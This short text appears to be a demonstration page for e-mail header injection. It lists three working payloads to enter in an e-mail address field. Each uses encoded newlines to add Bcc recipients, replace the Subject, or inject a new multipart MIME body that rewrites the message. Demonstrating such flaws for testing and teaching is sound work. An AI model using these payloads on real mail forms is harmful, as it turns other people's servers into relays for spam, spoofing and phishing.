This demo demonstrates the e-mail injection exploit. To test, enter sender@anonymous.www%0ABcc:someone@example.xxx,someothervictim@example.net as your e-mail address, or enter misterburns@springfield.xxx%0ASubject:My%20Anonymous%20Subject (changes the subject), or even axor@attack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0AMy%20New%20Message.%0A--frog-- (which completely changes the e-mail) as your e-mail address.